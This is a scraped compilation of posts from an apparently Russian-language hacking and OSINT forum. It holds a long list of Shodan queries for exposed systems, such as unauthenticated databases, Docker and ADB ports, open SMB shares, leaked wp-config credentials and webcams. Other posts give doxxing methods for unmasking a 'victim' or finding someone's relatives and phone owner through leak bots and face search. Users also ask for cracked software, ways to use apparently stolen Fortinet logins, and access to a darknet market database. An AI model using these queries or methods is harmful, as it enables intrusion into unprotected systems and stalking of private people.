![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2FhKQRcm58XBZ8mOzHNleMbiDwiQkNtEH9RX_VjL5yE9oMVE8ZNwvRd0n5uiDX15d-SFHZIF- GBpxKzLHno9IiWQc1htlAI3DcsMRouY3E5eDOOG6hvi48TqH02WEo8rUpKJr6meRY7gzs8TUc9iVshQzrOlVbx_7ghoqGn2p8HzfxY7P3c3S5wtJEzCrMAe0e7_zBddy- CREvbXGy2oCyVlSTZnqdoLFM- DyjYV1HA9dno6X19kYF0nU8csywsmf_V6cNT059Dt0rbLw4PFIJxC_n4AghuNJzsT0erN6LiVL5mX6ZPCG3zwH4wGJC7KQ5mVR40KB6ou5DL6F8LLVfUw.jpg&hash=80498de02b324a4a2701b6877d11a27d&return_error=1)
Инструментарий для проведения расследований, криминалистических исследований, корпоративной разведки, и исследований в области безопасности. Чат канала: t.me/forensictoolslive
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.telegram- cdn.org%2Ffile%2Fu8SSzPiaXp3yUdYwJ- JeXqzLqLiixPOTj7eCC5inCQlsSN1Qr9IOwNt9Nend0MrSNDggAz89JG_Q4A1S9vmshHychBMrq_sWFU1xKRyrRxj8R539EYrfHV2ULyWmN6NArHB6YS3IdtjGU_r_ymXDL2D5OqXx1i_KLAzmubzpeqNZr6MumYpsQFtSd98AOxyI5ocM2UmtpFUKr- cWD2mktXeUFO8MNRa9GkNX3aqkF5H8WMm3sZMrzQUWac9G-ph8AuEYcqXyn4ywalTTWVDOTrsXzZnHswBqk6GAcVIEmLBhlwrp_QA6lkv6M23TfXnq79JTsSCghMv1KrFj1m902g.jpg&hash=9f2b14e438cb4c22b106a3fc9465500c&return_error=1)
Русскоязычное сообщество по обсуждению OSINT и форензики.
t.me
You can view and join @smoke_osint right away.
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.telegram- cdn.org%2Ffile%2Fpv2aTWfTCj823IaiZX4NvoRWg4JsdyDn0lWFmh0yeuD9BUj1pbGukYY5tibo9tv0E8fH3PIx6hPdCLWDfepyg49pdWCZHEZouFL7nBfJvG-n4gHcPxo78jH7j8FvEFyA9ddTFv4Gaiosq5MwasUQ_HjXBrVYpZoBiUAEGAsIszcddTun9llVfuuQ8sHbxTfktAUoD96Pj7jSF12oHRBkrm0Hq1PrhIe13pWSY6OGfckk_oWPcGHskjcKhy55ts9qeOlklclyxr3aQpTKFPOcs0NzbM4uYZ72a5IfRMPeZJv- tRAPoH4vgfLOA9TcedWl32dtEheTxYEU8bQlne5POA.jpg&hash=7610eebe861b9a20cad9a6907d8e5583&return_error=1)
Единственная в своем роде библиотека по теме OSINT сбору информации из открытых источников, технологии конкурентной разведки, разведка в компьютерных сетях, инструменты сбора информации, расследований киберинцидентов, анализ пользовательских данных.
t.me
Форумы:
**Всем привет, хотелось бы поделится довольно старым, но иногда полезным ресурсомskidsearch, суть его проста - поиск UUID minecraft в базе данных
Для начала проходим простую регистрацию**
Далее заходим на сайтname mc**, и вбиваем в
графе поиска ник нужного нам человека, и далее копируем его UUID
После того как мы скопировали UUID , мы переходим обратно на сайт
skidsearch , и в графе Search Type мы выбираем UUID,
в графе Search Term вставляем UUID
**
Можно ли проверить, какие юзернэймы были у пользователя ранее?
For finding passwords, AWS access IDs, AWS secret access keys, Google OAuth Key, etc, good to use this tool: https://github.com/deepfence/SecretScanner
Чекеры имен на популярных сервисах
└ https://checkusernames.com/
└ https://namechk.com/
└ https://knowem.com/
└ https://www.namecheckr.com/
└ https://whatsmyname.app/
└ https://instantusername.com/#/
└ https://github.com/sherlock-project/sherlock
└ https://github.com/snooppr/snoop
└ @maigret_osint_bot
поступила нестандартная задача - найти родственников человека. живых, мёртвых,
в рф и снг, чем больше, тем лучше. что можете посоветовать в плане
методологии? может быть, есть какие-то специфические инструменты под эту
задачу?
я занимаюсь пробивом, но, обычно ищу контакты, деловые связи и чернуху. именно
родственников раньше искать не приходилось. какие есть идеи?
🗣Первое в России обучение Digital-Разведке
Мы увлечены использованием цифровых технологий, чтобы раскрыть все их преимущества для наших клиентов. Наши технологии используются журналистами, детективами и сотрудниками служб безопасности. Мы надёжно собираем и анализируем сложные данные, чтобы после прохождения обучения вы могли принимать точные решения в режиме реального времени в самых требовательных многодоменных средах.
Вот некоторые вдохновляющие примеры в области цифровой разведки для вас после
прохождения курса:
- Возможность дополнительного заработка, который легко совместить с основной
работой или учебой;
- Получение полного досье на человека;
- Использование нейросетей в получении данных;
- Анализ и проверка контрагентов;
- Внеквартальная премия к окладу на многих современных должностях, за счёт
уникальных навыков поиска и обработки информации.
Подробная информация о формате и программе:
](https://vc.ru/u/1311068-digital-razvedka/524779-polnaya-programma- obucheniya)
Курс проходит в закрытом телеграмм-канале. Один раз в день будет выходить пост-видео с материалом, любые вопросы можно задавать в прикреплённом чате или в лс ментору.
![vc.ru](/proxy.php?image=https%3A%2F%2Fvc.ru%2Fstatic%2Fbuild%2Fvc.ru%2Ffavicons%2Fapple- touch-icon-180x180.png&hash=815515efbc06242364439d5a27d6e603&return_error=1) vc.ru
Записаться на интенсив можно написав в лс форума или телеграм : @DigitalScouter
Доброго времени суток хацкеры, нуждаюсь в крякнутой версии Maltego, помогите кто может
Доброго времени суток, читатели. Появился такой вопрос -> как с технической точки зрения боты пробива в телеграм могут вытягивать информацию из закрытых чатов или же чатов в которых они не состоят? Единственное, что мне приходит в голову это API, но хотелось бы углублённо разобраться в этой теме. Понять как это происходит под капотом.
Буду рад прочитать ваши комментарии на этот счёт.
Помогите нубу советом...есть куча фортиков ip+log+pass+port но нет информации
о доменах...с чем,собственно,имеем дело....
nslookup показывает в основном провайдеры,а не истиный домен компаний
есть ли решение для их автоматического чека на домены/или вообще какое-то решение ручками?
Всем привет!
Мы запускаем новый сервис - Independent OSINT Database.
Есть поиск по хэшам, юзернеймам, реальным именам, емейлам, телефонным номерам,
и прочим ключам.
Также, в комплекте датасеты для работы с доменами, гео-данными, ip-адресами и
т.д.
Некоторые данные можно изучать прямо в браузере, есть гостевой доступ.
От Вас требуются базовые знания SQL, TOR браузер и включенный JS для демки.
Ссылка: osintdb47cibfi6u.onion
Зеркало: osintdb3upnmmyotyibd6kkvjwbkwgql4tocuscudafmvvjsobtsduyd.onion
It is time to look at OSINT in a different way)
![send.exploit.in](/proxy.php?image=https%3A%2F%2Fsend.exploit.in%2Fsend- fb.358d4b57.jpg&hash=824ffe54bac782fbc1c2b7f04639d4b7&return_error=1)
](https://send.exploit.in/download/441b45f925bd52e5/#O_Xv4N5UzXqtCPBFUaTOlw)
Encrypt and send files with a link that automatically expires to ensure your important documents don’t stay online forever.
send.exploit.in
С учетом изменений законодательства подскажите, кто из ботов по пробиву сейчас реально работает?
Полезно при поиске в различных странах и составлении дорков, указании параметров
Небольшая подборка ИИ-приложения для поиска места сделанного фотоснимка.
Приступим с узнаваемого GeoSpy AI _:
_
Данный сервис предоставит страну, штат, город, описание, карту и источники
обратного запроса по фотоснимку. Итог можно сохранить в .pdf формате, в своё
время было в .png. Регистрация не обязательная.
Earthkit — аналог сервиса Geoestimation, осуществляет всё те же задачи, в отличие от GeoSpy выдаёт все возможные вероятные места нахождения. Регистрация тоже не является обязательной.
Gemini — это модель от компании Google, она работает с несколькими типами данных: аудио, текст и фотоснимки. Сама модель бесплатная, но для работы потребуется учётная запись google.
Picarta** —** поможет отыскать ориентировочный радиус, страну, район или город. Чтобы раскрыть результаты, необходимо зарегистрироваться, предоставляется 3 бесплатных запросов на день.
ChatGPT — функционал, схожий с Gemini, но работает со многими файлами, после обновления так вообще стал лучше.
Ещё есть StreetClip, модель обучена на 1,1 миллиона городских и сельских изображений с географическими метками на уровне улиц.
Подходя к концу подборки, хочу уточнить, что ИИ это всего лишь вспомогательный инструмент, и полагаться на него целиком не стоит. Для более точно комбинирования советую сувать в ИИ по типу Gemini, Copilot и т.п не только фотоснимки, но и текстовые описания, к примеру, памятники, название заведений и тому подобное
Стоит вопрос в следующем, зная профиль человека ну допустим в инстаграме каким образом можно найти связи с другими социалками? Благодарю заранее.
Со временем собрал ассортимент интересных поисковых запросов к Shodan,
буквально поисковая система в Интернете.
Некоторые возвращают результаты серьезных и/или древних уязвимостей.
Большинство поисковых фильтров требуют учетной записи Shodan
https://www.shodan.io/
"Server: Prismview Player"
"in-tank inventory" port:10001
P372 "ANPR enabled"
mikrotik streetlight
"voter system serial" country:US
"Cisco IOS" "ADVIPSERVICESK9_LI-M"
"[2J[H Encartele Confidential"
http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2
"Server: gSOAP/2.8" "Content-Length: 583"
"Cobham SATCOM" OR ("Sailor" "VSAT")
title:"Slocum Fleet Mission Control"
Units
"Server: CarelDataServer" "200 Document follows"
services/wind-turbines.html) Farms
http.title:"Nordex Control" "Windows 2000 5.0 x86" "Jetty/3.1 (JSP 1.1; Servlet 2.2; java 1.6.0_14)"
Vehicle GPS Trackers
"[1m[35mWelcome on console"
"DICOM Server Response" port:104
"Server: EIG Embedded Web Server" "200 Document follows"
"Siemens, SIMATIC" port:161
"Server: Microsoft-WinCE" "Content-Length: 12581"
"HID VertX" port:4070
"log off" "select the appropriate"
"authentication disabled" "RFB 003.008"
99.99% are secured by a secondary Windows login screen.
"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"
title:"Weave Scope" http.favicon.hash:567176827
"MongoDB Server Information" port:27017 -authentication
"Set-Cookie: mongo-express=" "200 OK"
"X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Dashboard"
"Docker Containers:" port:2375
"Docker-Distribution-Api-Version: registry" "200 OK" -gitlab
"dnsmasq-pi-hole" "Recursion: enabled"
"root@" port:23 -login -password -name -Session
"Android Debug Bridge" "Device" port:5555
Lantronix password port:30718 -secured
"Citrix Applications:" port:1604
[Vulnerable](https://2016.zeronights.ru/wp- content/uploads/2016/12/CiscoSmartInstall.v3.pdf) (kind of "by design," but especially when exposed).
"smart install client active"
PBX "gateway console" -password port:23
Conferencing
http.title:"- Polycom" "Server: lighttpd"
Telnet Configuration:
"Polycom Command Shell" -failed port:23
support/integrations) Portal
"Server: Bomgar" "200 OK"
db.com/exploits/43385)
"Intel(R) Active Management Technology" port:623,664,16992,16993,16994,16995
HP-ILO-4 !"HP-ILO-4/2.53" !"HP-ILO-4/2.54" !"HP-ILO-4/2.55" !"HP-ILO-4/2.60" !"HP-ILO-4/2.61" !"HP-ILO-4/2.62" !"HP-iLO-4/2.70" port:1900
"x-owa-version" "IE=EmulateIE7" "Server: Microsoft-IIS/7.0"
"x-owa-version" "IE=EmulateIE7" http.favicon.hash:442749392
"X-AspNet-Version" http.title:"Outlook" -"x-owa-version"
"X-MS-Server-Fqdn"
"Authentication: disabled" port:445
Specifically domain controllers:
"Authentication: disabled" NETLOGON SYSVOL -unix port:445
Concerning [default network shares of
QuickBooks](https://quickbooks.intuit.com/learn-support/en-us/help-
articles/set-up-folder-and-windows-access-permissions-to-share-
company/01/201880) files:
"Authentication: disabled" "Shared this folder to access QuickBooks files
OverNetwork" -unix port:445
"220" "230 Login successful." port:21
"Set-Cookie: iomega=" -"manage/login.html" -http.title:"Log In"
Redirecting sencha port:9000
"Server: Logitech Media Server" "200 OK"
"X-Plex-Protocol" "200 OK" port:32400
"CherryPy/5.1.0" "/home"
"Server: yawcam" "Mime-Type: text/html"
("webcam 7" OR "webcamXP") http.component:"mootools" -401
"Server: IP Webcam Server" "200 OK"
html:"DVR_H264 ActiveX"
"Serial Number:" "Built:" "Server: HP HTTP"
ssl:"Xerox Generic Root"
"SERVER: EPSON_Linux UPnP" "200 OK"
"Server: EPSON-HTTP" "200 OK"
"Server: KS_HTTP" "200 OK"
"Server: CANON HTTP Server"
"Server: AV_Receiver" "HTTP/1.1 406"
"\x08_airplay" port:5353
"Chromecast:" port:8008
Solutions/Residential-Solutions) Controllers
"Model: PYNG-HUB"
title:"OctoPrint" -title:"Login" http.favicon.hash:1307375944
"ETH - Total speed"
Substitute .pem with any extension or a filename like phpinfo.php.
http.title:"Index of /" http.html:".pem"
Exposed [wp-config.php](https://github.com/WordPress/WordPress/blob/master/wp- config-sample.php) files containing database credentials.
http.html:"* The wp-config.php creation script uses this file"
"Minecraft Server" "protocol 340" port:25565
internet) in North Korea
net:175.45.176.0/22,210.52.109.0/24,77.94.35.0/24
port:17 product:"Windows qotd"
"X-Recruiting:"
По камерам
Code:Copy to clipboard
axis-cgi/jpg/image.cgi
/cgi-bin/guestimage.html
"/control/userimage.html"
"MOBOTIX Camera User"
title:"Robin SmartView"
Server: Viavideo-Web
title:"Camera 1"
"You need ID"
title:"Sanyo"
title:"SANYO NETWORK CAMERA"
title:"SANYO NETWORK OPTION BOARD"
title:"SANYO NETWORK VIDEO SERVER"
title:"CSP NETWORK CAMERA"
title:"DIGITAL VIDEO RECORDER CONTROL"
title:"DIGITAL VIDEO RECORDER"
title:"NETSuveillance WEB"
Server: alphapd
realm DCS -alphapd
dcs -alphapd -dcs-lig-httpd
dcs-lig-httpd
realm WCS
realm +DVR
DVR Streamer
SECOM DVR
DVRWebServer
DVR WebServer
dvr web
WebServer +DVR
NVR
server: network camera
dome camera
cube camera
security camera
Vision security system
axis
realm streaming_server
realm netcam
netcam -realm
flexwatch
IPCamera-Web
realm IPCamera
IPCamera UPnP
ADH-web
Steven+Wu
Camera Web Server -Steven
TVIP
TV-IP
PoE Camera
Boa ipcam
Boa cam
Boa camera
PLANET IP CAM
PLANET IP CAMERA
IPCamera_Logo
go1984
Vivotek
Wireless Camera
realm fcs
D-Link Camera
Internet Camera
Internet Camera -D-Link
brickcom
iPolis
Surveillance Camera
TeleEye
SQ-WEBCAM
samsung DVR
imagiatek
maygion
avigilon
onvif
MegapixelIPCamera
MiniAVServer
www-Authenticate: webcam
VideoJet
Catcher Console
IQinVision
BBVS -SecuritySpy
SecuritySpy
Powered by Nodinfo
mjpg streamer
VIDIO-STREAMER
BackStage Streamer
Android Webcam
Android dvr
DVR-Login
DVR Remote System
arecont
realm vision -arecont
yawcam
"server: jvc"
PelcoNet
VB100
server VB100
motion
logitec camera
divar
verint-webs
AccDVR
EvoCam
promelit
linux camera
linux ipcamera
linux dvr
server SafeCam
server: Milestone
title:flexwatch
title:webdvr
title:live
title:"live view"
title:"liveview"
title:"video system"
title:"camera"
title:"Axis"
title:"Video Recorder"
title:"Video Record"
title:"NVR"
#title:"DVR"
title:"DVR WebViewer"
title:"DVR Viewer"
title:"DVR Web " -title:"WEB Client"
title:"DVR WEB Client"
title:"DVR LOGIN"
title:"DVR Components Download"
title:"Web Viewer for Samsung DVR"
title:"DVR Netview"
title:"Web Client for DVR"
title:"Inspire DVR"
title:"dvr client"
title:"DVR System"
"Server: OwnServer1.0" -title:"DVR system"
title:"DVR REMOTE VIEWER"
"Server: MWS" -title:"DVR REMOTE VIEWER"
title:"DVR WebClient"
title:"DVR -- Detect Java Runtime"
title:"EverFocus"
"Server: HyNetOS" -title:"Bosch" -title:"EverFocus"
title:"DVR Applet"
title:"TOA Web DVR"
title:"Web CMS for DVR"
title:"STANDALONE DVR"
title:"Access Remote DVR"
"Server: Baby Web Server" -title:"Access Remote DVR PCBased"
title:"Video Server"
title:"DVR" -title:"DVR WebViewer" -title:"DVR Viewer" -title:"DVR Web " -title:"DVR WEB Client" -title:"DVR IE" -title:"DVR LOGIN" -title:"DVR Components Download" -title:"Web Viewer for Samsung DVR" -title:"DVR Netview" -title:"Web Client for DVR" -title:"Inspire DVR" -title:"dvr client" -title:"DVR System" -title:"DVR REMOTE VIEWER" -title:"DVR WebClient" -title:"DVR -- Detect Java Runtime" -title:"DVR Applet" -title:"TOA Web DVR" -title:"Web CMS for DVR" -title:"STANDALONE DVR" -title:"Access Remote DVR" -title:"Video Server"
#"Server: NetBox"
title:"+tm01+"
Itron
FlexiDome
starlight
Use 'live' as User Name
title:"bosch security systems"
title:"PTZ Internet Camera"
title:"WVC210"
title:"Network Video Recorder"
title:"Vilar"
title:"DCS"
title:"CAMERA Viewer"
title:"IP Camera" -title:"Viewer"
title:"Network Cube Camera"
title:"Video Surveillance System"
Lilin
ReeCam
iqhttpd
title:"Live Image"
#title:"NetCamXL Live Image"
title:"Live Images"
title:"IqEye"
title:"IqEye3"
box camera
title:"Login cgicc form"
title:"Weather Wing"
U S Software Web Server
NetBotz Appliance
"WEB Remote Viewer"
title:"Web Remote Client"
title:"Remote Monitoring System"
title:"Q-SEE"
server: Indy
title:"TOSHIBA Network Camera"
Server: NVS port:"80"
webcamXP
"Dahua Technology"
Avtech
Hikvision
GeoHttpServer
title:"DVR IE"
netwave camera
Принцип работы Shodan, на самом деле, очень прост. Он ищет и собирает баннеры. которые описывают службу, используемую на устройстве. Баннер для Shodan это основная единица информации.
Один из примеров баннера — это баннер веб-сервера т.е. заголовок.
По кодам статусов можно понять как реагирует сервер на запрос:
200 — все хорошо, запрос успешный;
300 — перенаправление на другую страницу;
400 — проблема с запросом;
500 — проблема с сервером.
После этого идет непосредственно сам заголовок. В котором содержится
разнообразная техническая информация. Грубо говоря, смысл в том, что в
абсолютно любом протоколе есть баннер.
А в абсолютно любом баннере есть техническая информация. Она, конечно,
отличается в зависимости от протокола, но смысл, я думаю, понятен. Именно эти
данные и собирает Shodan. А учитывая что, очень часто, в баннере содержится
довольно много данных описывающих само устройство, это может быть очень
полезно. Помимо этого Shodan также собирает метаданные устройства. Например
геолокацию, операционную систему и т.д.
Перед тем как начинать работать с Shodan есть смысл там зарегистрироваться. Это имеет смысл хотя бы потому, что нам станет доступно больше результатов поиска, фильры и можем получить свой API ключ.
Самый простой вариант поиска — это ввести название или производителя нужного
нам устройства.
Например если мы введем tp-link то справа увидим найденные устройства и их
баннеры, а слева некоторые статистические данные, по которым также можно
отфильтровать устройства. Также нужно помнить, что это не Google, а потому
запрос для поиска обрабатывается как точное выражение, без всяких вариаций.
Только вот подобный поиск вряд ли может быть полезен из-за огромного
количества результатов. Только если ты не занимаешься сбором статистики. Тут
ещё нужно отметить, что по умолчанию Shodan показывает результаты собранные за
последние 30 дней и ищет только по баннерам, не принимая в учет метаданные.
Чтобы эту ситуацию исправить и конкретизировать результаты поиска нужно
использовать фильтры.
Фильтры — это, по сути, просто конкретизация запроса. Они работают как
уточнение запроса. Тут нужно учитывать, что чтобы максимально эффективно
использовать Shodan нужно очень хорошо понимать: во-первых что ты хочешь
найти, а во-вторых как работает нужное тебе устройство: какое программное
обеспечение использует, какие у него бывают версии, какой протокол, ну и
другую техническую информацию в зависимости от устройства.
Хорошая новость в том, что, скорее всего, то что ты хочешь найти, уже кто-то
когда-то искал, а значит он мог поделится своей методикой поиска и где-то
опубликовать запрос который дал результат.
Да и вообще для практики и тренировки неплохо будет изучить что и как люди
ищут.
Для этого Shodan собирает наиболее популярные запросы:
https://www.shodan.io/explore/popular?page=1
Теперь более подробно о самих фильтрах. Как видишь запрос tp-link дал нам почти полтора миллиона результатов. Это, мягко говоря, многовато. Что бы сократить количество результатов, для начала мы можем отфильтровать их по стране. Для этого используется фильтр country и, после двоеточия, без пробелов указываем код страны.
Например: tp-link country:RU покажет результаты по России. Чтобы было легче использовать этот фильтр ниже таблица с кодами стран:
По такому же принципу работают и другие фильтры. Т.е. логика их использования такая: сначала указываем сам запрос, а потом пишем фильтр и через двоеточие, без пробела, значение для фильтра. Если значение состоит из нескольких слов то его нужно взять в кавычки.
запрос фильтр:значение
Наиболее популярные фильтры Shodan:
country : — покажет данные только по выбранной стране, например
country:RU
city: — покажет данные только по выбранному городу, например city:Moskow
os: — найти определенную операционную систему, например os:linux
geo: — поиск по геопозиции, нужно указать координаты, например
geo:»45.0746,39.0587″
port: — покажет результаты только по выбранному порту, например port:22
hostname: — будет искать только в определенной доменной зоне, например
hostname:.ru
net: — поиск в заданном сетевом диапазоне, например net:190.73.40.50/24
product: — поиск по названию программы отдающей баннер, например
product:openssh
Также нужно знать, что если мы хотим убрать из выдачи результаты по какому то фильтр, то перед фильтром нужно поставить знак минус, например если написать country:UA -city:Kiev, то нам покажет все результаты поиска по Украине, без результатов по Киеву. По такому же принципу это работает и с другими фильтрами.
Чтобы было более понятно, как все это работает давай посмотрим примеры поиска.
Давай, для примера найдем вебкамеры, в Москве, которые используют порт 8080:
webcam country:RU city:Moscow port:8080
Теперь, для разнообразия, давай найдем, например, сервера nginx, под управлением операционной системы Linux, с открытым портом 5000
nginx os:linux port:5000
Как видишь, таких серверов не мало. Полученные результаты мы можем
дополнительно отфильтровать по параметрам которые мы видим в таблице слева.
А если выберем какой-то конкретный результат, то увидим развернутую информацию
о нем. В том числе IP-адрес, геопозицию, страну, какие порты открыты, какие
службы эти порты используют, ну и кончено баннеры этих служб.
Я думаю, с тем как формировать запросы Shodan более-менее понятно.
This is an OSINT tool which gathers useful and yet credible valid information about a phone number, user's email address and IP address and more to come in feature updates
Code:Copy to clipboard
https://github.com/TermuxHackz/X-osint
В этой теме, хотел бы поделиться опытом разведки в интернете.
Что такое OSINT? OSINT- это проще говоря сбор информации с открытых
источников, такие как: VK, OK, Facebook, Twiter (он же X) и других соц. сетей.
Также поиск информации можно проводить с использованием различных форумах,
таких как это. Сейчас будет резонный вопрос: В смысле с использованием
форумов? Но поступит следующий ответ: Многие пользователи для того, чтобы не
запоминать много различных логинов, используют одни и те же как в соц. сетях
так и в таком мессенджере как Telegram. Но опять же, в какая связь между
Форумами и Telegram? В телеграмме, всем известно о существовании такого бота
как Osint_bot, он же Глаз Бога. Приведу пример, как это делается: У нас есть
пользователь на форуме с именем, к примеру, hacker228. Берём его никнейм и
добавляем символ @ и пишем в телеграмме в поиске пользователей@hacker228. Если
результат положительный, то с вероятностью 73% (процент не выдуманный,
проводился эксперимент моей команды) будет пользователь с форума. За скромные
400р Вы получаете подписку на 1 месяц (30 дней) с лимитом в 100 запросов. Этот
бот работает на основе слитых баз данных, на алгоритме, который проверяет
возможные совпадения никнейма, номера телефона в соц. сетях и от туда берёт
информацию. Проще говоря, Вы пишите боту возможный никнейм, он используя свою
базу данных и кибер-разведку, даёт отчет о пользователю.
РЕКОМЕНДУЮ: Если всё же вам будет интересна эта тема, то лучше покупайте
одноразовые российские номера, на которые Вы одноразово получите код для
верификации телеграмма и выкинете. Если Вы, из Украины, Беларуси и других
стран СНГ, для покупки номера, воспользуйтесь сайтами по продажам номеров
телефона, таким как SMS Activate.
Благодарю за внимание, на этом пока всё! Буду рад прочитать Ваши рекомендации
по кибер-разведке!
Такой вопрос,
Есть зона скажем ab.com
Как мне найти все сабдомены в этой зоне
может быть полезным
https://flightradar24.com - отслеживание полётов в режиме реального
времени.
https://planefinder.net - полеты и другая информация о воздушных судах.
https://www.radarbox.com - полеты и другая информация о воздушных судах.
https://flightaware.com - отслеживание полетов и информация о статусе
рейсов.
https://aviationstack.com - рейсы и расписание в аэропортах.
https://globe.adsbexchange.com - глобальное отслеживание полетов на основе
данных ADS-B.
https://planefinder.net - сервис для отслеживания полетов и информации о
воздушных судах.
https://www.planespotters.net/ - информация по самолетам.
https://opensky-network.org - некоммерческий волонтерский проект по
отслеживанию рейсов.
https://skyvector.com - планировщик для авиарейсов.
https://github.com/ANG13T/skytrack - OSINT-инструмент для сбора данных о
полетах и генерации отчётности.
Доступен скрипт shotstars, решающий проблему с отслеживанием исчезновения "звёзд" у проектов на GitHub. Штатные возможности GitHub не предоставляют пользователям информацию по убывающим "звёздам" в проекте и позволяют получить сведения только по их прибавлению. Проект написан на языке Python и распространяется под лицензией GPLv3+. Готовые сборки, не требующие наличия в системе Python, доступны для GNU/Linux, Windows и Android (Termux).
Идея скрипта "shotstars" состоит в следующем:В самом начале пользователь выбирает чей репозиторий он хочет отслеживать. Далее скрипт будет парсить звезды на предмет их убывания и прибавления за определённый пользователем промежуток времени, формируя список различий между предыдущим сканированием и текущем состоянием. Регистрация в GitHub, авторизация и токен для работы скрипта не требуются. Поддерживается парсинг звёзд с проверками на ошибки и ограничения, имитация результатов, отчёты в CLI и HTML в том числе с расчётами дат. Работа shotstars рассчитана на средние и небольшие проекты, имеющие до 6000 звёзд (лимит API GitHub в 6K звезд/час).
Вопрос в шапке глаз бога не предлогать.
Domain registration feeds:
domaintools.com - paid
securitytrails.com - paid
whoisxmlapi.com - paid
otx.alienvault.com - free
Are there any more out there?
В последнее время все чаще сталкиваюсь со случаями, когда есть номер
мобильного телефона, однако установить текущего владельца - та еще задача.
Особенно часто это случается в регионах. Почему так? Не знаю. Вероятно, когда
в Москве ты приобретаешь номер мобильного телефона, то на него сразу же
оформляешь аккаунты в онлайн магазинах, на маркет-плейсах, приложениях банка,
на госуслугах и прочее. То есть ты полностью "повязан" со своим номерочком. В
регионах же до сих пор не все так просто. В регионах почему-то часто принято
менять номера "как перчатки", передавать родственникам, тетям, дядям,
бабушкам. В этом смысле расследование затрудняется сразу в разы. Почему?
Потому что чем больше неструктурированных данных - тем сложнее понять, куда
смотреть.Какие советы могу дать и что реально работает? 1)
Для начала все имеющиеся утечки и теги по номеру постараться выстроить в
хронологическом порядке. Смотрите дату утечки, дату регистрации на том или
ином сервисе, в той или иной социальной сети. Так будет понятно, в какие
примерно промежутки времени кто использовал данные цифры
2) Обязательно попробуйте проверить привязку к онлайн-банку. Это в большинстве
случаев гарантирует идентификацию: владелец личного кабинета в банке =
нынешний владелец номера. В большинстве случаев это так, но не всегда 3)
Проверить наличие Whatsapp просто необходимо. Чаще всего, если WhatsApp на
данном номере есть, то номер активен и используется для связи. Иногда аватарка
выдает фактического владельца. Либо по совпадению в других соц сетях, либо,
как было недавно в моей практике, по номеру личного авто, который владелец не
захотел обрезать/замазать
4) Изучите историю никнеймов аккаунта в телеге, если такой привязан. Иногда
бывает так, что аккаунт переходит вместе с номером от одного владельца к
другому. Сейчас такое происходит гораздо реже, так как SMS не приходит, если
на данном номере есть живой акк, однако раньше такое бывало, что конкретно
сбивало во время расследований.Поэтому, если вы видите, что в 2017 году
аккаунт назывался "Наталья Петрова", а в 2023 он стал "Террорист
наркоманович", не спешите отправлять тяжелых домой к Наталье Петровой, она
может быть потеряла этот номер около 7 лет назад, и никак не связана ни с
незаконным оборотом наркотиков, ни с террористической деятельностью.
Источник: https://t.me/CyberScoutszametki
Я собрал эти инструменты вместе, и они идеально подходят для этапа разведки.
snov.io/email-finder
experte.com/email-finder
github.com/Josue87/EmailFinder
github.com/GiJ03/Infoga
infoga.io
findemail.io
hunter.io/domain-search
anymailfinder.com/mail-finder-by-domain
minelead.io
На просторах мессенджера telegram существуют некие боты-ловушки от компании "Интернет Розыск" во главе с Игорем Бедеровым.
Созданы они были с целью деанонимизировать пользователей мессенджера, просят для верификации в боте поделиться контактом и перейти по короткой ссылке на redirecting.tech, что является их IP logger-ом. После этого, номер телефона пользователя, ip, вместе с его юзернеймом и ID будет занесён в их базу, и любой желающий сможет его увидеть, не исключено использование ботов правоохранительными органами, с учетом тесного сотрудничества Игоря Бедерова с силовыми структурами.
Большинство ботов удалены или заблокированы, однако это не повод закрывать на это глаза, на их места поставят новые (либо уже).
Пример таких ботов:
@protestchat_bot - бот для деанона либералистов, просит поделиться контактом,
дабы получать информацию о протестах, на деле там просто ссылка на канал
Навального.
@checknumb_bot - бот для "проверки" номера в утечках, для его использования,
естественно, нужно и свой номер дать, после чего он попадает в их базу.
Центральных бот этой инфраструктуры - @TgAnalyst_bot, через который
пользователи могут получить информацию других пользователей, которые повелись
на ловушку.
У вас может возникнуть вопрос: "Что делать если я когда-то перешел по логгеру
и теперь мой ip адрес выдается ботом?"
Это поправимо. @TgAnalyst_bot выдает последние 50 фингерпринтов по вашему
аккаунту, а значит вам нужно включить VPN и написать одному из ботов, что бы
система сгенерировала для вас логгер-ссылку. Теперь вам нужно просто 50 раз
специально перейти по логгеру, не забывайте включать kill switch в настройках
вашего VPN. Конечно, это совсем не гарантирует исчезновение предыдущих
результатов из базы, но это защитит от "пробива" сторонними пользователями.
Можете сами ввести свой ID в бота и убедиться в этом.
PimEyes is a great OSINT tool that has the ability to track down images of people using AI, I have played around with a lot of OSINT tools but PimEyes really blew me away. There is a 14 year old challenge to find a guy named Satoshi (not related to BTC), well it remained uncracked for 14 years, until somebody tried using PimEyes to have another go at it. Here is the YouTube video which goes through the challenge and how PimEyes can be used. I highly recommend watching this! It is a truly amazing tool
-------------------------------------------------------------------------------------------------------------------------------------------------
PimEyes-отличный инструмент OSINT, который позволяет отслеживать изображения людей с помощью искусственного интеллекта, я играл со многими инструментами OSINT, но PimEyes действительно поразил меня. Существует 14-летняя задача найти парня по имени Сатоши (не связанного с BTC), но он оставался не взломанным в течение 14 лет, пока кто-то не попытался использовать PimEyes, чтобы еще раз попробовать. Вот видео на YouTube, в котором рассказывается об этой задаче и о том, как можно использовать фрагменты. Я настоятельно рекомендую посмотреть это! Это действительно удивительный инструмент
Вопрос в шапке
Как/Через кого получают доступ к БД Solaris?
Для начала начнем с простого конечно вы все слышали о таком сайте как 220VK через который можно узнать кого скрывает твоя жертва и не только...
Следующее что мы тебе советуем это купить подписку на VK.watch (очень полезный сайт через который можно дохуя чего узнать по типу смененных данных пользователя)
Если на странице есть настоящее ебло пользователя ,но ты сомневаешься в его
валидности советую пойти на сайт "https://findclone.ru/" ,на нем ты сможешь
100% убедиться валидное имя или нет.(конечно сайт не бесплатный но можно
схитрить,создаая новый аккаунт вам все время будет доступно сделать 1 пробив
по лицу)
,но если вдруг ты не можешь оплатить подписку на этом сайте то есть его
бесплатная копия не такая ахуенная но все же, "https://search4faces.com/"
Есть и такие ебучие особи которые закрывают свои страницы но тебе просто необходимо чекнуть его друзей,для таких ушлепков создан сайт "<https://online- vk.ru/>"
